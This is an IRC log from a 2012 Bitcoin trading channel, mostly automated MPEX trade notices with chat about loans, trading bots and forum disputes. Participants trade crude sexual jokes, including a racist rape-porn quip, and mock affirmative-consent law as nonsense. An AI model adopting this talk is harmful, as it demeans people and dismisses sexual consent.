0.00048841 = 5.582 BTC [+] Nov 09 18:52:47 [MPEX] [S.MPOE] 27150 @ 0.0004895 = 13.2899 BTC [+] Nov 09 18:52:48 [MPEX] [S.MPOE] 8457 @ 0.00048955 = 4.1401 BTC [+] Nov 09 18:52:50 [MPEX] [S.MPOE] 45500 @ 0.00048998 = 22.2941 BTC [+] Nov 09 18:52:51 [MPEX] [S.MPOE] 26350 @ 0.00049175 = 12.9576 BTC [+] Nov 09 18:52:52 [MPEX] [S.MPOE] 36650 @ 0.00049437 = 18.1187 BTC [+] Nov 09 18:52:52 [MPEX] [S.MPOE] 9628 @ 0.00049547 = 4.7704 BTC [+] Nov 09 18:52:53 [MPEX] [S.MPOE] 41322 @ 0.00049748 = 20.5569 BTC [+] Nov 09 18:52:54 [MPEX] [S.MPOE] 3538 @ 0.00050001 = 1.769 BTC [+] Nov 09 18:52:56 [MPEX] [S.MPOE] 34392 @ 0.00050042 = 17.2104 BTC [+] Nov 09 18:52:57 [MPEX] [S.MPOE] 32950 @ 0.00050288 = 16.5699 BTC [+] Nov 09 18:52:58 [MPEX] [S.MPOE] 19470 @ 0.00050304 = 9.7942 BTC [+] Nov 09 18:52:59 [MPEX] [S.MPOE] 4155 @ 0.00050449 = 2.0962 BTC [+] Nov 09 18:53:00 [MPEX] [S.MPOE] 29009 @ 0.00050518 = 14.6548 BTC [+] Nov 09 19:18:24 I am inclined to assume that MPOE-PR is a minion acting in behalf of Mircea Popescu. Nov 09 19:18:32 lmao this is the discovery of the century. Nov 09 19:18:40 [MPEX] [S.MPOE] 57207 @ 0.0005 = 28.6035 BTC [-] Nov 09 19:22:02 shill Nov 09 19:22:21 she should at least disclose Nov 09 19:22:46 that guy should be on retainer. Nov 09 19:36:12 did joel say that? Nov 09 19:45:54 [MPEX] [S.MPOE] 22074 @ 0.00050379 = 11.1207 BTC [+] Nov 09 19:53:02 Chaaang-Noi no, the other guy Nov 09 19:54:01 ahh Nov 09 20:11:25 [MPEX] [S.MPOE] 13476 @ 0.00050379 = 6.7891 BTC [+] Nov 09 20:11:27 [MPEX] [S.MPOE] 4668 @ 0.00050301 = 2.3481 BTC [-] Nov 09 20:36:47 [MPEX] [S.MPOE] 1491 @ 0.00050518 = 0.7532 BTC [+] Nov 09 20:36:48 [MPEX] [S.MPOE] 9941 @ 0.00050575 = 5.0277 BTC [+] Nov 09 21:00:18 OMG, so many more pixels Nov 09 21:01:29 :D Nov 09 21:02:54 [MPEX] [S.MPOE] 15750 @ 0.00050449 = 7.9457 BTC [-] Nov 09 21:04:52 lol Nov 09 21:05:10 it's like i was one of those just-bearly-legally-blind people before, and just had laser eye surgery Nov 09 21:05:32 lol! Nov 09 21:06:41 holy shit, i don't need to have my browser window maximized! Nov 09 21:09:30 next, check out some pr0n and see how much better pussy looks in HD Nov 09 21:09:55 =) Nov 09 21:09:56 hahaha Nov 09 21:10:05 why not irl Nov 09 21:11:38 remember all of the pr0n from like 94 on the tubes and how pixelated it was lol? Nov 09 21:11:42 good times Nov 09 21:11:54 i dont reccomend hd porn, you end up on wiki researching all sorts of std Nov 09 21:12:16 ahh, i see your point kakobrekla Nov 09 21:12:20 i remember ascii porn Nov 09 21:13:13 haha ( . Y . ) Nov 09 21:14:56 too bad (_|_)bot is erroneous nick Nov 09 21:15:09 awe Nov 09 21:21:03 /nick {_|_}bot Nov 09 21:21:05 try like that :P Nov 09 21:34:57 that could be easily interpreted as two boobs Nov 09 21:35:13 not really Nov 09 21:35:17 it's a butt Nov 09 21:38:06 i thought it was a biscuit Nov 09 21:40:55 kuzetsa, imagine this woman lies down on the floor naked and you look from top http://3.bp.blogspot.com/-FI21JCXFOXg/UFoMH7IBZ4I/AAAAAAAADhM/zxwOLirnH3k/s400/big-boobs-2.jpg Nov 09 21:41:01 you will see {_|_} Nov 09 21:56:34 [MPEX] [S.MPOE] 5600 @ 0.00050301 = 2.8169 BTC [-] Nov 09 22:04:20 smickles: 400 utc i will be awake i promise! Nov 09 22:05:07 [MPEX] [S.MPOE] 17830 @ 0.00050301 = 8.9687 BTC [-] Nov 09 22:05:32 [MPEX] [S.MPOE] 12270 @ 0.0005 = 6.135 BTC [-] Nov 09 22:05:51 heh, ok, I'll be sure to be there :) Nov 09 22:08:30 do you know of nate silver? Nov 09 22:09:39 who doesn't! Nov 09 22:09:47 everyone is talking about him these days (for the wrong reasons, probably) Nov 09 22:10:04 i read his book recently Nov 09 22:10:18 we make a lot of bad predictions Nov 09 22:13:59 ;;lucky "nate silver" Nov 09 22:14:00 http://fivethirtyeight.blogs.nytimes.com/author/nate-silver/ Nov 09 22:19:11 hmm, i wonder how much of the information in his book is on lesswrong.com, and whether it would be worth buying since that site is free to use Nov 09 22:22:58 it's a good idea to spend ten bux or w/e to support an author you like Nov 09 22:23:06 mostly because if you don't, there won't be any. Nov 09 22:23:28 [MPEX] [S.MPOE] 15000 @ 0.0005 = 7.5 BTC [-] Nov 09 22:23:38 while I agree, I dunno if I like nate silver or not Nov 09 22:24:01 and it's not like that site replicates the content of the book Nov 09 22:24:15 they seem to have a similar topic of discussion Nov 09 22:25:02 well if you don't know find out lol Nov 09 22:25:10 if you care, obviously. Nov 09 22:48:50 [MPEX] [S.MPOE] 35523 @ 0.0005 = 17.7615 BTC [-] Nov 09 22:48:52 [MPEX] [S.MPOE] 4224 @ 0.00049989 = 2.1115 BTC [-] Nov 09 23:14:00 [MPEX] [S.MPOE] 29276 @ 0.00049989 = 14.6348 BTC [-] Nov 09 23:14:02 [MPEX] [S.MPOE] 18824 @ 0.00049909 = 9.3949 BTC [-] Nov 09 23:39:20 [MPEX] [S.MPOE] 11576 @ 0.00049909 = 5.7775 BTC [-] Nov 09 23:39:21 [MPEX] [S.MPOE] 8124 @ 0.00049903 = 4.0541 BTC [-] Nov 09 23:57:42 Large deposit on my account Mircea. Technically just in, but would appreciate being able to place orders right away =P Nov 10 00:01:47 in mircealand, 5k is large. Not 200 :D Nov 10 00:03:25 Right, I forgot about that Nov 10 00:04:06 You're almost right on for 5k vs 200 too Nov 10 00:04:26 I'm assuming 5k being among the large deposit based on certain large orders. Nov 10 00:04:50 [MPEX] [S.MPOE] 16639 @ 0.00050449 = 8.3942 BTC [+] Nov 10 00:04:52 [MPEX] [S.MPOE] 14661 @ 0.00050575 = 7.4148 BTC [+] Nov 10 00:05:14 all deposits done Nov 10 00:05:28 you know, i've been processing for everyone if pinged, no relation to size. Nov 10 00:06:06 ofc. just wanted to joke about the "large" adjective Nov 10 00:27:27 Thank you for processing so fast Nov 10 00:29:53 [MPEX] [S.MPOE] 15802 @ 0.00050575 = 7.9919 BTC [+] Nov 10 00:29:54 [MPEX] [S.MPOE] 13908 @ 0.0005063 = 7.0416 BTC [+] Nov 10 00:55:10 [MPEX] [S.MPOE] 26959 @ 0.00049903 = 13.4533 BTC [-] Nov 10 00:58:22 lol what! Nov 10 00:59:10 nothing! Nov 10 00:59:15 :) Nov 10 01:01:22 lol Nov 10 01:01:53 You are being CTCP flooded from m0f0, ignoring *!*@79.141.173.79 Nov 10 01:01:56 You are being CTCP flooded from m0f0, ignoring *!*@79.141.173.79 Nov 10 01:02:02 You are being CTCP flooded from m0f0, ignoring *!*@79.141.173.79 Nov 10 01:02:04 You are being CTCP flooded from m0f0, ignoring *!*@79.141.173.79 Nov 10 01:02:11 You are being CTCP flooded from m0f0, ignoring *!*@79.141.173.79 Nov 10 01:02:14 You are being CTCP flooded from m0f0, ignoring *!*@79.141.173.79 Nov 10 01:02:30 hm, pathetic ban msg Nov 10 01:20:20 [MPEX] [S.MPOE] 8946 @ 0.00049903 = 4.4643 BTC [-] Nov 10 01:20:22 [MPEX] [S.MPOE] 7654 @ 0.0004988 = 3.8178 BTC [-] Nov 10 01:37:04 ahahaha katz is getting better and better Nov 10 01:41:37 but anyway, Diablo-D3 this maybe interests you https://bitcointalk.org/index.php?topic=121915.msg1327078#msg1327078 Nov 10 01:41:39 (last quote) Nov 10 01:43:18 Are you still arguing? Nov 10 01:43:49 the only one arguing now is pretteymuch katz Nov 10 01:44:09 the rest just want to slap some reality into him or smth Nov 10 01:45:37 [MPEX] [S.MPOE] 9250 @ 0.0004988 = 4.6139 BTC [-] Nov 10 01:46:13 rdponticelli_ the great advantage of hiring women to do your dirty work Nov 10 01:46:18 i watched disgrace in the meanwhile. Nov 10 01:52:48 Everybody is just wasting time Nov 10 01:53:51 as oposed to what ? Nov 10 01:56:57 Just agree that you'll ever disagree Nov 10 01:57:02 who ? Nov 10 01:57:50 dawg, what do i care what joel k. nobody does or doesn't do ? does he own something ? is he somebody ? why'd i give a fuck exactly ? Nov 10 01:58:01 he and the girl can argue till one drops dead as far as i'm concerned Nov 10 01:58:06 what the forum is for in the end, innit ? Nov 10 02:12:01 [MPEX] [S.MPOE] 6606 @ 0.00050097 = 3.3094 BTC [+] Nov 10 02:15:10 lol Nov 10 02:15:16 im in an obamacare-free state Nov 10 02:15:20 so i can indulge, yet. Nov 10 02:15:42 :D Nov 10 02:19:25 anyway. night all! **** BEGIN LOGGING AT Sat Nov 10 09:11:32 2012 Nov 10 09:31:03 [MPEX] [S.MPOE] 7300 @ 0.00049744 = 3.6313 BTC [-] Nov 10 09:56:12 [MPEX] [S.MPOE] 9379 @ 0.00049532 = 4.6456 BTC [-] Nov 10 09:56:14 [MPEX] [S.MPOE] 12471 @ 0.00049525 = 6.1763 BTC [-] Nov 10 10:21:26 [MPEX] [S.MPOE] 33500 @ 0.00049744 = 16.6642 BTC [+] Nov 10 10:47:55 [MPEX] [S.MPOE] 26250 @ 0.00049564 = 13.0106 BTC [-] Nov 10 10:47:57 [MPEX] [S.MPOE] 9850 @ 0.00049525 = 4.8782 BTC [-] Nov 10 11:13:04 [MPEX] [S.MPOE] 22866 @ 0.00049525 = 11.3244 BTC [-] Nov 10 11:13:04 [MPEX] [S.MPOE] 12834 @ 0.00049522 = 6.3557 BTC [-] Nov 10 11:38:57 [MPEX] [S.MPOE] 5100 @ 0.00049591 = 2.5291 BTC [+] Nov 10 11:38:59 [MPEX] [S.MPOE] 37600 @ 0.00049634 = 18.6624 BTC [+] Nov 10 11:50:19 The charity Childline says a girl born in South Africa is more likely to be raped in her lifetime than learn to read. Nov 10 11:56:39 Guardian had a good article about charities. Their main goal is not to fix the problems but to spread panic so they can get more and more money. And this was not about some small 1 day projects. Nov 10 11:57:27 this money is wasted on all sorts of bs and make the fuckers rich who run the charity. "What about children..." scams work every time Nov 10 12:04:10 I bet, you old pervert mircea_popescu were, searching for negro rape porn but ran in to a SA charity article ... lol Nov 10 12:04:45 [MPEX] [S.MPOE] 5696 @ 0.00049522 = 2.8208 BTC [-] Nov 10 12:04:47 [MPEX] [S.MPOE] 17950 @ 0.00049513 = 8.8876 BTC [-] Nov 10 12:04:47 [MPEX] [S.MPOE] 2254 @ 0.00049492 = 1.1155 BTC [-] Nov 10 12:06:19 EskimoBob the chartiy thing is pretty well known Nov 10 12:06:31 they don't exist to do their stated job, they exist to pay the salaries of those involved. Nov 10 12:07:19 much like... you know, government. Nov 10 12:08:18 I can not find this article but it was also talking about how kids are now days scared of grownups and how things are gone so bad that people do not even help kids on the street because they can be later charged for who knows what. "protect children" charities have huge role on this Nov 10 12:08:46 i remember reading something like that. Nov 10 12:09:11 actually the comment for this article where really informative. Some of the stories, damn Nov 10 12:09:25 i know a couple of different people who left the uk after the 2003 law requiring men "obtain positive agreement at all stages of intercourse" or some such bs Nov 10 12:09:42 and these are people worth well in the 10s of millions. Nov 10 12:09:59 it's all one huge orb of stupidity around sex. Nov 10 12:10:06 in 2012, STILL the boogaboo. Nov 10 12:13:19 there was this one guy telling teh story how a he was on the playground with his kid and someone else kid gut stuck and nobody helped her because of possible sexual assault charges for "touching her"... I mean WTF! All the dad where standing around and did NOTHING. All scared shitless Nov 10 12:14:18 so they had to get women as witnesses to even help that kid Nov 10 12:14:32 wtf! And this is UK, USA etc Nov 10 12:15:12 not etc. Nov 10 12:15:19 I have kids and reading this shit was brr.... really strange Nov 10 12:15:21 just the us and it's 51st state Nov 10 12:15:35 i don't have kids, but i do find it ridiculous. Nov 10 12:16:22 it's all this self feeding stupidity, kids these days believe about 1/3 of the general population is gay, cause that's what they get shown on tv and is implied in school Nov 10 12:16:35 male gays are still the 3% they always were. lesbians still the half percent. Nov 10 12:17:05 i doubt people actually sexually interested in children are one in ten thousand, but the general consensus seems to be "over 100%" Nov 10 12:17:48 but anyway, off to some meetings. later. Nov 10 12:30:14 [MPEX] [S.MPOE] 700 @ 0.00049634 = 0.3474 BTC [+] Nov 10 12:57:36 [MPEX] [S.MPOE] 10000 @ 0.00049708 = 4.9708 BTC [+] Nov 10 13:22:46 [MPEX] [S.MPOE] 28256 @ 0.00049708 = 14.0455 BTC [+] Nov 10 13:22:47 [MPEX] [S.MPOE] 4644 @ 0.00049692 = 2.3077 BTC [-] Nov 10 13:48:18 [MPEX] [S.MPOE] 32450 @ 0.000497 = 16.1277 BTC [+] **** BEGIN LOGGING AT Sat Nov 10 21:30:35 2012 Nov 10 21:41:53 sooo... what's new ? Nov 10 21:47:27 [MPEX] [S.MPOE] 24265 @ 0.0004946 = 12.0015 BTC [-] Nov 10 21:47:29 [MPEX] [S.MPOE] 7035 @ 0.00049446 = 3.4785 BTC [-] Nov 10 22:12:34 [MPEX] [S.MPOE] 19690 @ 0.00049614 = 9.769 BTC [+] Nov 10 22:12:35 [MPEX] [S.MPOE] 4660 @ 0.00049446 = 2.3042 BTC [-] Nov 10 22:37:56 [MPEX] [S.MPOE] 3205 @ 0.00049446 = 1.5847 BTC [-] Nov 10 22:37:57 [MPEX] [S.MPOE] 33234 @ 0.00049392 = 16.4149 BTC [-] Nov 10 22:37:58 [MPEX] [S.MPOE] 10361 @ 0.00049387 = 5.117 BTC [-] Nov 10 23:03:06 [MPEX] [S.MPOE] 2821 @ 0.00049807 = 1.4051 BTC [+] Nov 10 23:03:08 [MPEX] [S.MPOE] 19679 @ 0.00049919 = 9.8236 BTC [+] Nov 10 23:13:29 yup, earned 5 BTC for drawing :) Nov 10 23:17:31 link? Nov 10 23:17:37 https://bitcointalk.org/index.php?topic=122881.20 Nov 10 23:18:45 haha wd. Nov 10 23:18:56 some people just have all the winning. Nov 10 23:19:24 guess having kakobrekla as contestant added some inspiration :P Nov 10 23:19:47 hm? Nov 10 23:21:08 ;;gettrust kakobrekla Nov 10 23:21:09 Trust relationship from user jurov to user kakobrekla: Level 1: -1, Level 2: 0 via 0 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=jurov&dest=kakobrekla Nov 10 23:21:20 not -10 anymore? good :) Nov 10 23:21:26 lol you two. Nov 10 23:21:58 oh no afaik its still there. Nov 10 23:22:45 ;;unrate kakobrekla Nov 10 23:22:47 Successfully removed your rating for kakobrekla. Nov 10 23:22:58 not worth the fuss. fuck the fsa. Nov 10 23:23:12 ;;unrate jurov Nov 10 23:23:13 Successfully removed your rating for jurov. Nov 10 23:23:15 smart man. Nov 10 23:24:06 in other news, augusto croppo wants to know what mpoe-pr's credentials are. Nov 10 23:24:25 i guess he doesn't see signatures or something. Nov 10 23:25:26 augusto c may not accept text on a screen as credentials Nov 10 23:25:40 ctrl+p Nov 10 23:25:42 o i see Nov 10 23:25:47 lol Nov 10 23:25:51 yesterday we just burned 2 hours together with smickles to get me loan... ended it all up by scanned doc with shopped signatures Nov 10 23:26:05 what ?! Nov 10 23:26:09 cause lender does not know anything bout gpg Nov 10 23:26:19 hahaha WHAT ? Nov 10 23:26:25 yeah, it was awesome, in a way Nov 10 23:26:30 fill me n Nov 10 23:26:31 in* Nov 10 23:27:40 well, a contract was written up. I expected it to be double signed with pgp sigs, but they ended up printing it and using physical sigs Nov 10 23:28:10 lol Nov 10 23:28:25 [MPEX] [S.MPOE] 3800 @ 0.00049387 = 1.8767 BTC [-] Nov 10 23:28:26 what interest if it's notsecret ? Nov 10 23:28:52 also, somewhat unrelatedly, proposed scammer tag : http://polimedia.us/dtng/c/src/134777535061.jpg Nov 10 23:28:59 you'd have to ask jurov, i'm the third party in that thing Nov 10 23:29:00 it's public, lemme dig the thread... Nov 10 23:29:15 https://bitcointalk.org/index.php?topic=122156.msg1327143#msg1327143 Nov 10 23:30:27 .3% day ? 2.x a week ? Nov 10 23:30:29 SCAM OMG Nov 10 23:30:39 everyone knows this is invested in pirate. Nov 10 23:31:27 well, apparently this is around market standard lending rate nao. Nov 10 23:31:38 Topic: §§§ Bitcoin Lending Thread - Currently 0 BTC available @ 9% per month (Read 190 times) Nov 10 23:31:41 I should start a market competitor for these loans, i could just cash-advance on a credit card, charge a little bit on top and slaughter these rates Nov 10 23:31:45 right. this is funny cause the mpbor is 9% Nov 10 23:31:49 i guess the market is alligning. Nov 10 23:32:18 i really wouldn't be doing that smickles. Nov 10 23:32:27 yeah, i'm not going to Nov 10 23:32:32 but the potential is there Nov 10 23:32:54 not really. the cost of underwriting these loans far exceeds any benefit. Nov 10 23:33:21 you won't find a credit officer working for less than 100s of BTC PER LOAN. Nov 10 23:34:01 and from the lendee's perspective, if i really needed a btc loan, at these rates, a cash advance on a cc to buy btc is one of at least 5 things i would look into b/f a direct btc loan Nov 10 23:34:30 right,. Nov 10 23:34:53 loans will exist as a market after behemoths a la s.dice/s.mpoe etc are fully floated and held by 1000s of people. Nov 10 23:35:10 then things like buyouts etc will make sense financially, both as size and as risk. Nov 10 23:35:24 i'm maxed out my bank+creditcard already.. and it does not accept s.mpoe as collateral Nov 10 23:35:54 jurov: I hope you know that I meant no personal slight there :) Nov 10 23:36:19 wat? i did not notice any :) Nov 10 23:37:25 i considered non-bank loan but these whores ask more than 9% a month anyway Nov 10 23:40:25 o mircea, you actually know some credit officer working for more than 100s of BTC PER LOAN? Nov 10 23:41:43 not that i want more nao, but someday later Nov 10 23:42:34 you don't take my meaning. Nov 10 23:42:47 the credit officer is the person working for the lender that says yes or no to an application. Nov 10 23:42:58 if they consider 100 applications in one month you owe them say 50`000 btc. Nov 10 23:43:05 borrowing btc at those rates is flat out stupid. Nov 10 23:43:31 EskimoBob for sure it only makes sense if you're doing btc stuff. Nov 10 23:43:47 (ie, you are using the loan denomination to eat your btc-collapse risks) Nov 10 23:43:56 actually borrowing anything at rates like that is absurd, unless this "stuff" has a massive inflation Nov 10 23:44:03 jeebus, my market maker bot is at 92k in size, and I'm not even done Nov 10 23:46:14 you mean LOC or BTC? Nov 10 23:46:38 LOC? Nov 10 23:46:42 lines of code Nov 10 23:46:50 92k file size Nov 10 23:47:40 i would've said it in LOC, but it's across multiple files, so it'd not be worth it to add them up Nov 10 23:48:56 @.@ so many TODOs Nov 10 23:49:18 well, my quasi-scalper has 40k, and it uses coinbr lib elsewhere. and was not even profitable Nov 10 23:49:44 just very useful to test and find mpex bugs :P Nov 10 23:50:58 clearly, you had too few k. that's why it wasn't profitable ;P Nov 10 23:51:32 and was not even profitable << heh Nov 10 23:52:03 didn't you get a multi-trillion options position at some point in a db desync ? Nov 10 23:52:09 hehe... s.mpoe was hard to scalp, too tight spread.. and options were possible.. if you waited days Nov 10 23:52:42 mircea_popescu, sadly the attempt to slip withdrawal past you failed :/ Nov 10 23:52:46 lol Nov 10 23:52:58 duh, trade db was liek "orly?!" Nov 10 23:53:31 [MPEX] [S.MPOE] 739 @ 0.00049387 = 0.365 BTC [-] Nov 10 23:53:32 [MPEX] [S.MPOE] 17092 @ 0.00049362 = 8.437 BTC [-] Nov 10 23:53:34 [MPEX] [S.MPOE] 11200 @ 0.00049347 = 5.5269 BTC [-] Nov 10 23:53:35 [MPEX] [S.MPOE] 2919 @ 0.0004934 = 1.4402 BTC [-] Nov 10 23:53:53 BAN HIM!!! BAN HIM WITH FIRE!!! Nov 10 23:53:56 and i was like... Nov 10 23:54:12 no, he's a good man Nov 10 23:54:17 lmao Nov 10 23:54:21 but hey, it did the same thing to smickles at some point Nov 10 23:54:25 i think 2-3 months in a row was like Nov 10 23:54:28 I'm consistantly baffled at the fact that things which seem so simple from a human perspective, are actually fucking complicated Nov 10 23:54:37 "smickles you say ?! MOAR LIEK SCAMKES!!! BAN HJIM!!!!" Nov 10 23:54:49 heh Nov 10 23:55:46 :o Nov 10 23:56:00 this nick is thrilling Nov 10 23:57:25 lol Nov 11 00:04:42 [MPEX] [S.MPOE] 13870 @ 0.00049919 = 6.9238 BTC [+] Nov 11 00:04:44 [MPEX] [S.MPOE] 52850 @ 0.0004998 = 26.4144 BTC [+] Nov 11 00:04:44 [MPEX] [S.MPOE] 30350 @ 0.00050161 = 15.2239 BTC [+] Nov 11 00:04:45 [MPEX] [S.MPOE] 39800 @ 0.00050174 = 19.9693 BTC [+] Nov 11 00:04:46 [MPEX] [S.MPOE] 18400 @ 0.00050175 = 9.2322 BTC [+] Nov 11 00:04:48 [MPEX] [S.MPOE] 7200 @ 0.00050231 = 3.6166 BTC [+] Nov 11 00:04:49 [MPEX] [S.MPOE] 36950 @ 0.0005028 = 18.5785 BTC [+] Nov 11 00:04:50 [MPEX] [S.MPOE] 25956 @ 0.0005035 = 13.0688 BTC [+] Nov 11 00:04:51 [MPEX] [S.MPOE] 47200 @ 0.00050409 = 23.793 BTC [+] Nov 11 00:04:52 [MPEX] [S.MPOE] 25820 @ 0.0005042 = 13.0184 BTC [+] Nov 11 00:04:53 [MPEX] [S.MPOE] 9945 @ 0.00050438 = 5.0161 BTC [+] Nov 11 00:04:54 [MPEX] [S.MPOE] 39107 @ 0.00050604 = 19.7897 BTC [+] Nov 11 00:04:54 [MPEX] [S.MPOE] 19242 @ 0.0005063 = 9.7422 BTC [+] Nov 11 00:04:55 [MPEX] [S.MPOE] 31800 @ 0.00050669 = 16.1127 BTC [+] Nov 11 00:04:56 [MPEX] [S.MPOE] 11626 @ 0.00050673 = 5.8912 BTC [+] Nov 11 00:04:58 [MPEX] [S.MPOE] 10074 @ 0.00050683 = 5.1058 BTC [+] Nov 11 00:04:59 [MPEX] [S.MPOE] 6950 @ 0.00050707 = 3.5241 BTC [+] Nov 11 00:05:00 [MPEX] [S.MPOE] 10272 @ 0.00050727 = 5.2107 BTC [+] Nov 11 00:05:01 [MPEX] [S.MPOE] 44900 @ 0.00050739 = 22.7818 BTC [+] Nov 11 00:05:02 [MPEX] [S.MPOE] 25350 @ 0.00050753 = 12.8659 BTC [+] Nov 11 00:05:03 [MPEX] [S.MPOE] 49100 @ 0.00050759 = 24.9227 BTC [+] Nov 11 00:05:03 [MPEX] [S.MPOE] 10393 @ 0.00050795 = 5.2791 BTC [+] Nov 11 00:05:04 [MPEX] [S.MPOE] 28100 @ 0.0005085 = 14.2889 BTC [+] Nov 11 00:05:05 party! Nov 11 00:05:05 [MPEX] [S.MPOE] 29100 @ 0.00050853 = 14.7982 BTC [+] Nov 11 00:05:08 uh oh :) Nov 11 00:06:13 http://live.coinbr.com/?mpsic=S.MPOE Nov 11 00:06:21 this is actually getting to look kinda like the real deal huh Nov 11 00:08:16 evidently there's someone thinking like me, but who hasn't such loan problems :) Nov 11 00:09:11 *without such problems, i mean Nov 11 00:09:25 its all a bubble, sell before bitb comes out i tell you! Nov 11 00:10:40 I love bubbles Nov 11 00:11:20 bitb upon us? oh no Nov 11 00:14:34 what's bitb ? Nov 11 00:15:10 1. go to mpex front page Nov 11 00:15:18 2. scroll down to the bottom Nov 11 00:15:27 lmao omfg owned Nov 11 00:16:23 jurov : reload. Nov 11 00:20:44 haha, you didn't know that was still down there 'eh? Nov 11 00:20:48 K. prefix? what wicked financial instrument are you concocting now? Nov 11 00:23:23 lol Nov 11 00:23:34 the kumbaya Nov 11 00:23:40 mod6 i had forgotten lol/ Nov 11 00:23:49 :] Nov 11 00:23:57 oh... i didn't see K. in this list: Nov 11 00:23:58 http://trilema.com/2012/mpsics-in-detail/ Nov 11 00:24:01 Reward-Drop ETA: 2012-11-29 00:03:55 (2 weeks, 4 days, 1 hour, 40 minutes) Nov 11 00:24:11 where did you see that jurov Nov 11 00:24:14 oh cause it's made up Nov 11 00:24:33 oh :) Nov 11 00:24:35 mircea, not kolchoz ? Nov 11 00:24:47 i bought a new lappy, just setting it up... bbiab Nov 11 00:29:54 indeed i suspect mircea turned communist and will start kolkhoz soon :D Nov 11 00:30:00 [MPEX] [S.MPOE] 31820 @ 0.00051095 = 16.2584 BTC [+] Nov 11 00:37:28 ya. CCCP LIVES Nov 11 00:55:52 [MPEX] [S.MPOE] 18050 @ 0.00051 = 9.2055 BTC [-] Nov 11 01:20:58 [MPEX] [S.MPOE] 23150 @ 0.00051 = 11.8065 BTC [-] Nov 11 01:25:06 [MPEX] [S.MPOE] 13550 @ 0.00051003 = 6.9109 BTC [+] Nov 11 01:43:59 i'm currently thinking on improving new order screen of coinbr, you won't believe what evil idea i just came up with Nov 11 01:44:33 user won't have to copy/paste thhe price, he just clicks into graph similar to live.coinbr.com Nov 11 01:46:14 imagine that. no messing with these forms, just click into the graph to generate order of given price and quantity Nov 11 01:46:43 i'll make ipad app for that :DDDD Nov 11 01:47:23 either i'm insane or brilliant, not sure Nov 11 01:50:02 "oh my cat ran over the ipad" lol Nov 11 01:50:10 [MPEX] [S.MPOE] 37415 @ 0.00051015 = 19.0873 BTC [+] Nov 11 01:50:12 [MPEX] [S.MPOE] 4385 @ 0.00051 = 2.2364 BTC [-] Nov 11 01:52:23 "Great MPEx Panic Of 2013 Caused By Cat Stepping On IPad" Nov 11 01:55:16 better to go sleep, bye Nov 11 01:59:51 that's pretty good Nov 11 02:15:31 [MPEX] [S.MPOE] 30100 @ 0.00051 = 15.351 BTC [-] Nov 11 02:16:03 [MPEX] [S.MPOE] 49960 @ 0.00051 = 25.4796 BTC [-] Nov 11 02:16:04 [MPEX] [S.MPOE] 1005 @ 0.00050974 = 0.5123 BTC [-] Nov 11 02:41:41 [MPEX] [S.MPOE] 3201 @ 0.00050974 = 1.6317 BTC [-] Nov 11 02:41:42 [MPEX] [S.MPOE] 8300 @ 0.00050913 = 4.2258 BTC [-] Nov 11 02:41:44 [MPEX] [S.MPOE] 49703 @ 0.0005091 = 25.3038 BTC [-] Nov 11 03:06:50 [MPEX] [S.MPOE] 1672 @ 0.0005091 = 0.8512 BTC [-] Nov 11 03:06:50 [MPEX] [S.MPOE] 17800 @ 0.00050745 = 9.0326 BTC [-] Nov 11 03:06:52 [MPEX] [S.MPOE] 18296 @ 0.00050661 = 9.2689 BTC [-] **** BEGIN LOGGING AT Sun Nov 11 13:16:09 2012 Nov 11 13:29:22 [MPEX] [S.MPOE] 11845 @ 0.00050108 = 5.9353 BTC [-] Nov 11 13:29:23 [MPEX] [S.MPOE] 5158 @ 0.00050039 = 2.581 BTC [-] Nov 11 13:46:55 ;;later tell btc-mining would you be so kind as to post in https://bitcointalk.org/index.php?topic=121915.220 Nov 11 13:46:56 The operation succeeded. Nov 11 13:47:09 ;;later tell btc-mining i think it is your obligation to your investors to help prosecute the scammer. Nov 11 13:47:10 The operation succeeded. Nov 11 13:55:06 [MPEX] [S.MPOE] 48397 @ 0.00050039 = 24.2174 BTC [-] Nov 11 13:55:07 [MPEX] [S.MPOE] 86 @ 0.0005002 = 0.043 BTC [-] Nov 11 14:20:17 [MPEX] [S.MPOE] 22764 @ 0.0005002 = 11.3866 BTC [-] Nov 11 14:20:18 [MPEX] [S.MPOE] 17349 @ 0.00049979 = 8.6709 BTC [-] Nov 11 14:45:22 [MPEX] [S.MPOE] 25450 @ 0.00049979 = 12.7197 BTC [-] Nov 11 15:10:45 [MPEX] [S.MPOE] 39200 @ 0.00050175 = 19.6686 BTC [+] Nov 11 15:23:46 anyone sploke to casascius recently? Nov 11 15:25:28 i cant reach the guy, all the mails are bouncing back goddammit Nov 11 15:36:00 [MPEX] [S.MPOE] 26200 @ 0.00050175 = 13.1459 BTC [+] Nov 11 16:01:26 [MPEX] [S.MPOE] 24900 @ 0.00050605 = 12.6006 BTC [+] Nov 11 16:01:27 [MPEX] [S.MPOE] 9100 @ 0.00050715 = 4.6151 BTC [+] Nov 11 16:26:53 [MPEX] [S.MPOE] 6100 @ 0.00050469 = 3.0786 BTC [-] Nov 11 16:52:28 [MPEX] [S.MPOE] 13743 @ 0.0005021 = 6.9004 BTC [-] Nov 11 17:17:50 [MPEX] [S.MPOE] 17000 @ 0.0005021 = 8.5357 BTC [-] Nov 11 17:43:00 [MPEX] [S.MPOE] 21807 @ 0.0005021 = 10.9493 BTC [-] Nov 11 17:43:01 [MPEX] [S.MPOE] 4651 @ 0.00049979 = 2.3245 BTC [-] Nov 11 17:43:02 [MPEX] [S.MPOE] 8242 @ 0.00049862 = 4.1096 BTC [-] Nov 11 18:01:19 kakobrekla i think he's active on forum Nov 11 18:01:47 sent him a pm as well Nov 11 18:01:53 but i guess he didnt get the notice on the email Nov 11 18:01:54 hehe Nov 11 18:08:30 [MPEX] [S.MPOE] 37158 @ 0.00049862 = 18.5277 BTC [-] Nov 11 18:08:32 [MPEX] [S.MPOE] 11426 @ 0.00049858 = 5.6968 BTC [-] Nov 11 18:20:51 !ticker s.mpoe Nov 11 18:20:53 [MPEX:S.MPOE] 1day: 0.0004934 / 0.00050333 / 0.00051095 (2193849 shares, 1,104.24 BTC), 30day: 0.00030871 / 0.00044148 / 0.00051095 (75251680 shares, 33,222.70 BTC) Nov 11 18:22:15 ;;bc,24hprc Nov 11 18:22:16 10.81 Nov 11 18:33:46 [MPEX] [S.MPOE] 31200 @ 0.00050217 = 15.6677 BTC [+] Nov 11 18:58:56 [MPEX] [S.MPOE] 3674 @ 0.00049858 = 1.8318 BTC [-] Nov 11 18:58:58 [MPEX] [S.MPOE] 3526 @ 0.00049857 = 1.758 BTC [-] Nov 11 19:24:28 [MPEX] [S.MPOE] 16600 @ 0.00049857 = 8.2763 BTC [-] Nov 11 19:49:38 [MPEX] [S.MPOE] 